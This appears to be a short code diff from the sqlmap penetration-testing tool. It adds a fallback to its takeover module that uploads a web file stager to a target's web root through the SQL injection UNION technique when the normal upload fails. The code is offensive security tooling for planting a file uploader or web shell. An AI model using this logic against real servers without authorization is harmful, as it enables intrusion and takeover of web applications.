|
14 | 14 | from lib.core.agent import agent |
15 | 15 | from lib.core.common import arrayizeValue |
16 | 16 | from lib.core.common import Backend |
| 17 | +from lib.core.common import decloakToMkstemp |
17 | 18 | from lib.core.common import decloakToNamedTemporaryFile |
18 | 19 | from lib.core.common import extractRegexResult |
19 | 20 | from lib.core.common import getDirs |
@@ -238,16 +239,28 @@ def webInit(self): |
238 | 239 | self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/') |
239 | 240 |
|
240 | 241 | uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) |
241 | | - |
242 | 242 | uplPage = uplPage or "" |
243 | 243 |
|
244 | 244 | if "sqlmap file uploader" not in uplPage: |
245 | 245 | warnMsg = "unable to upload the file stager " |
246 | 246 | warnMsg += "on '%s'" % localPath |
247 | 247 | singleTimeWarnMessage(warnMsg) |
248 | | - continue |
249 | 248 |
|
250 | | - elif "<%" in uplPage or "<?" in uplPage: |
| 249 | + if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): |
| 250 | + infoMsg = "trying to upload the file stager via " |
| 251 | + infoMsg += "UNION technique" |
| 252 | + logger.info(infoMsg) |
| 253 | + |
| 254 | + stagerDecloacked = decloakToMkstemp(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) |
| 255 | + self.unionWriteFile(stagerDecloacked.name, self.webStagerFilePath, "text") |
| 256 | + |
| 257 | + uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) |
| 258 | + uplPage = uplPage or "" |
| 259 | + |
| 260 | + if "sqlmap file uploader" not in uplPage: |
| 261 | + continue |
| 262 | + |
| 263 | + if "<%" in uplPage or "<?" in uplPage: |
251 | 264 | warnMsg = "file stager uploaded on '%s', " % localPath |
252 | 265 | warnMsg += "but not dynamically interpreted" |
253 | 266 | logger.warn(warnMsg) |
|
0 commit comments